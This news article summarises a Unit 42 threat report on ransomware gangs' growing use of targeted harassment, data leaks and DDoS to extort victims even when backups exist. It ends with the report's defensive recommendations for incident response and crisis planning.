Ransomware gangs are becoming increasingly assertive and aggressive in their approaches to victims, resorting to high-pressure tactics including campaigns of targeted harassment to extort money, even from those that have paid attention to ransomware prevention and maintain backups of their data.
This is according to a report published today by Palo Alto Networks’ Unit 42 incident response and threat intelligence department. The data – which is drawn only from cases responded to by Unit 42, so is by no means a full or wholly accurate assessment of activity volumes – found that ransomware gangs used harassment as a tactic 20 times more often last year than they did in 2021.
Typically, harassment in a ransomware case is aimed at a specific individual, often in a leadership role at a victim organisation or its customers. It involves a series of increasingly aggressive phone calls and emails to pressure them into paying a ransom, or to pressure customers into pressurising those who are empowered to pay a ransom to do so. It may also involve cyber criminals spreading word about the attack on social media or reaching out to technology journalists.
This is on top of existing layered extortion techniques, which besides encryption of data includes data exfiltration and leakage – seen in 70% of attacks last year, up by 30% on 2021 – and distributed denial of service (DDoS) attacks – seen in around 2% of ransomware incidents. These trends, referred to as double and triple extortion, have become well-established since 2020.
“Ransomware and extortion groups are forcing their victims into a pressure cooker, with the ultimate goal of increasing their chances of getting paid,” said Wendi Whitmore, senior vice-president and head of Unit 42 at Palo Alto Networks.
“Harassment has been involved in one of every five ransomware cases we’ve investigated recently, showing the lengths these groups are willing to go to coerce a payday. Many are going so far as to leverage customer information that has been stolen to harass them and try to force the organisation’s hand into payment.”
Wendi Whitmore, Unit 42, Palo Alto Networks
Unit 42’s researchers join a growing number of voices who believe that these trends demonstrate how backups – long held to be the cornerstone of any half-decent ransomware-prevention strategy – are no longer effective in guarding against the impact, in and of themselves.
While keeping up-to-date, offline and regularly tested backups remains a vital safeguard, Unit 42 found that double and triple extortion techniques have become so effective that ransomware gangs are still able to coerce their victims into paying even if the data is backed up and protected, and operational disruption is minimised.
Often, they said, the mere threat of sensitive data being publicly exposed, the ensuing reputational damage and loss of confidence, and the threat of fines from regulators, none of which can be prevented by maintaining backups, is enough to force a victim to back down.
Indeed, Unit 42 said it had worked on a number of incidents in which victims had initially refused to countenance the idea of paying a ransom because their backups were in good order, but were then subjected to such intense harassment that the resulting costs exceeded the ransomware demand. LockBit negotiators used this possibility as a threat when trying to extort Royal Mail earlier this year, although the postal service ultimately stood its ground.
If they have not already done so, Unit 42 recommends security leaders prepare an enhanced playbook to deal with more sophisticated extortion campaigns.
Such a playbook should include the establishment of a comprehensive incident response plan and corresponding crisis communications protocols, establishing a chain of command for which stakeholders should be involved and who is empowered to do what – for example, who negotiates, who is authorised to sign off on a payment should it come to that, and so on.
The plan should also cover what employees should do – or avoid doing – if they are subjected to telephone or email harassment during an incident. Harassment training should be delivered to staff to better equip them in this regard.
Security leaders should also make sure they are able to conduct post-mortem compromise assessments to validate that any backdoors or other indicators of compromise (IoCs), such as scheduled tasks or jobs, are removed to make follow-on attacks less likely.
Unit 42’s researchers said that over the coming nine months, we will likely see a rise in extortion linked to insider threats, politically motivated extortion attempts, and the use of ransomware and extortion to distract from attacks aimed at compromising the victim’s supply chain – or, in the case of tech companies, their source code. The team also predicted that we will see a “large cloud ransomware compromise” in the near future.